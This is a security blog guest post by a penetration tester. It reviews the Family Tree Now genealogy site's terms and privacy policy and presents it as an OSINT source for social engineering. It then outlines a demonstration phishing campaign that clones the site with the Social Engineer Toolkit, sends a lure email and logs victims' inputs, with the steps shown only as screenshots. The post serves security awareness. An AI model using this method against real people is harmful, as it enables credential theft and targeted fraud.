Phishing Family Tree Now: A Social Engineering Odyssey

Joe Gray* //

You may have heard about a new genealogy tool called Family Tree Now. It is a (seemingly) 100% free tool (more on that later) that allows you to enumerate your family tree without having to enter much data (initially) beyond your name. While it can be useful – especially if family reunions are your thing, if you’re doing a school project, or if you’re trying to locate relatives – the issue here is that you are not the only one that may find it useful. As with anything, it can be used as a tool or a weapon. Just like a hammer, the determination comes from intention. Below is my analysis and application of the resource.

My Analysis

I went through the Family Tree Now site and analyzed various policies to understand how they operate and what their goals are. In the About section, they talk about the company and the culture in vague terms. This feels like marketing hype, so I didn’t spend much time there.

Terms & Conditions

In the Terms and Conditions [link] (T&C) section, it talks about the uses for the site, both authorized and unauthorized. This is strange to me as they do not require any authentication to lock users out, aside from the presumable ability to block an IP address that is abusive. In the T&C, there is a provision that grants Family Tree Now a copyright on any data input into the system, which essentially allows them to copyright YOUR family data.

In terms (see what I did there?) of use, the T&C outlines it as such:

  • Only for appropriate, legal purposes, and in compliance with all applicable federal, state and local laws and regulations
  • Obtain any and all necessary licenses, certificates, permits, approvals or other authorizations required by federal, state or local statute, law or regulation that govern your use of the Services
  • Not use the Services in a manner that may cause emotional or physical harm to anyone, or to “stalk” or otherwise harass another person
  • Not use the Services to seek information about or harm minors in any way
  • Not use the Services to seek information about celebrities or public figures
  • Not use the Service to promote or provide instructional information about illegal activities or promote physical harm or injury against any group or individual
  • Not resell any of the information you obtain from the Services without our prior written consent (They don’t like competition)
  • Take reasonable steps to ensure that the information you receive from the Services is stored in a secure manner

Privacy

In a nutshell, they collect information via account registration, interactions with features/functionality, “cookies and other technologies we collect your IP address, device identifier, browser type, operating system, mobile carrier, and your ISP, and receive the URLs of sites from which you arrive on our Site,” and interactions with third party sites. This is a very broad collection campaign. Back to the whole, what/who is the product debate.

The site admits to using the data to administer your account, customize the services, create and distribute advertising relevant to your experience, send you promotional communications through email, for internal business purposes, analyze trends and statistics, for audits/to determine the effectiveness of promotional campaigns, protect the security or integrity of applications and business, and to contact you if necessary.

To sum up what you can do: review and edit information, control messages, and close your account. Notice the term is close, not DELETE. I guess they forgot about Ashley Madison.

I’m no lawyer and I possess no formal legal training or expertise, but this sounds like we are the product. There are few provisions for the security of data collected, which is kind of logical for this type of site. That is the issue with the model of not requiring a barrier or barriers to entry such as payment or authentication.

Monetization

Monetization is addressed in the privacy policy. Ironic? Not really. If you’re not paying for the service or product, often you become the product. This is sometimes the case even if you do pay, so do not let that aspect fool you. Michael Bazzell frequently talks about this with Justin Carroll on the Complete Privacy & Security Podcast.

OSINT Angle

This is obviously an OSINT treasure chest. It includes lots of possibly sensitive information. It is publicly available on the internet – best of all, it’s free. The only issue is that there is no API, and per the T&C, automated gathering is not permitted. From here, an attacker can confirm existing data or determine possible relationships to check out. This can enable the attacker to penetrate the inner circle of the target using different vectors and angles.

Social Engineering Angle

I have always said that genealogy websites are a hacker’s best friend when trying to social engineer beyond *ishing and when trying to reset passwords. I used to cite Ancestry.com or Genealogy.com as top leads for family oriented attacks, with Facebook being a close number 3. You can’t keep Mom or Grandma from posting those embarrassing pictures and giving a narrative, right? In the past few months, I have added stick families on back windshields and now Family Tree Now to my arsenal as numbers 1 & 2.

So what can we do with the information we gather from Family Tree Now in Social Engineering attacks? This is a near limitless list. As with most (if not all) penetration testing and social engineering engagements, time is the limiting factor. If you have enough time, you can successfully perform Social Engineering on anyone. Below is a scenario that I cooked up using Family Tree Now:

I cloned the website using Social Engineer Toolkit. https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/1.png

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/2.png

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/3.png

The resulting site is here

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/4.png

Notice the difference in it and the REAL site:

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/5.png

At this point, I “sprung” the phishing email. Note that this is not the best email, but it is not the worst either.https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/9.png

Upon clicking Validate, the victim would see this:

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/6.png

Should they choose to opt-out, they’ll end up here:

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/7.png

Clicking the link in the top of the email, they’ll simply see the landing page (above).

Should they provide any information or click any link, they end up with a “payload.”

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/8.pngRegardless of what they do, I am keeping log data (which also records any inputs they provide)

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/10.png

Conclusion

In conclusion, the attack vector that I outlined is not unique to Family Tree Now. The timing of the attack is why I found it interesting. Because the site is expected to be asking for intimate and personal information, people who end up on the site are more apt to click one way or the other. Not having an API slows the attacks down from the perspective of the site. I feel like if authentication and/or payment were required, this would be much more of a non-issue. I have been singing the praises of using Ancestry.com for a while.

This is not really much different than using IntelTechniques or OSINTFramework for gathering OSINT on targets. Nor is this much different than Social Media. This will work as an excellent tool for validating and confirming the data that has already been gathered and when coupled with the social engineering attack, the success rate of any data gathering and payload delivery is amplified.

__

*A Guest post from Joe Gray, CISSP-ISSMP, GSNA, GCIH

Joe Gray joined the U.S. Navy directly out of High School and served for seven years as a Submarine Navigation Electronics Technician. Joe is an Enterprise Security Consultant at Sword & Shield Enterprise Security in Knoxville, TN. Joe also maintains his own Blog and Podcast – Advanced Persistent Security. He is also in the SANS Instructor Development pipeline, teaching SANS Security 504: Hacker Tools, Techniques, Exploits, and Incident Handling. In his spare time, Joe enjoys reading news relevant to information security, attending information security conferences, contributing blogs to various outlets, bass fishing, and flying his drone. Follow him on Twitter and see his profile on LinkedIn.